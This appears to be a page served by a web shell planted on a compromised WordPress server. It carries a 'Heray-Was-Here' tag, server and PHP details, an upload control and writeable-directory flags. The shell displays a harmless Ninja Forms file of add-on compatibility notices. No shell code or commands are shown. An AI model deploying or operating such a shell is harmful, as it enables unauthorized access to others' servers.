Heray-Was-Here
Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.1.31
Disable Function : NONE
Directory :  /opt/matlock/wp-content/plugins/ninja-forms/includes/Config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /opt/matlock/wp-content/plugins/ninja-forms/includes/Config/VersionCompatibilityCheck.php
<?php

/**
 * Array of compatibility checks and notices
 */
return [
    [
        'className' => 'NF_Authorize_Net',
        'minVersion' => '3.1.1',
        'title' => esc_html__('Attention Authorize.net users', 'ninja-forms'),
        'message' => sprintf(esc_html__('Please update your Authorize.net add-on for Ninja Forms. The version you are using is not compatible with your current version of Ninja Forms. %sIf you have questions or need help, please %scontact our support team%s.', 'ninja-forms'), '<br />', '<a style="background-color:transparent; padding:0; text-decoration:underline;"href="'. \admin_url('admin.php?page=nf-system-status').'">', '</a>'),
        'int' => 0,
        'link'=>'<a href="https://ninjaforms.com/docs/installation/#add-ons">Update now</a>'
    ],
    [
        'className' => 'NF_Recurly',
        'minVersion' => '3.0.5',
        'title' => esc_html__('Attention Recurly users', 'ninja-forms'),
        'message' => sprintf(esc_html__('Please update your Recurly add-on for Ninja Forms. The version you are using is not compatible with your current version of Ninja Forms. %sIf you have questions or need help, please %scontact our support team%s.', 'ninja-forms'), '<br />', '<a style="background-color:transparent; padding:0; text-decoration:underline;"href="'. \admin_url('admin.php?page=nf-system-status').'">', '</a>'),
        'int' => 0,
        'link'=>'<a href="https://ninjaforms.com/docs/installation/#add-ons">Update now</a>'
    ],
    [
        'className' => 'NF_Stripe_Checkout',
        'minVersion' => '3.2.6',
        'title' => esc_html__('Attention Stripe Users', 'ninja-forms'),
        'message' => sprintf(esc_html__('Please update your Stripe add-on for Ninja Forms. The version you are using is not compatible with your current version of Ninja Forms. %sIf you have questions or need help, please %scontact our support team%s.', 'ninja-forms'), '<br />', '<a style="background-color:transparent; padding:0; text-decoration:underline;"href="'. \admin_url('admin.php?page=nf-system-status').'">', '</a>'),
        'int' => 0,
        'link'=>'<a href="https://ninjaforms.com/docs/installation/#add-ons">Update now</a>'
    ],
    [
        'className' => 'NF_UserAnalytics',
        'minVersion' => '3.0.3',
        'title' => esc_html__('Attention User Analytics Users', 'ninja-forms'),
        'message' => sprintf(esc_html__('Please update your User Analytics add-on for Ninja Forms. The version you are using is not compatible with your current version of Ninja Forms. %sIf you have questions or need help, please %scontact our support team%s.', 'ninja-forms'), '<br />', '<a style="background-color:transparent; padding:0; text-decoration:underline;"href="'. \admin_url('admin.php?page=nf-system-status').'">', '</a>'),
        'int' => 0,
        'link'=>'<a href="https://ninjaforms.com/docs/installation/#add-ons">Update now</a>'
    ]
];

Hry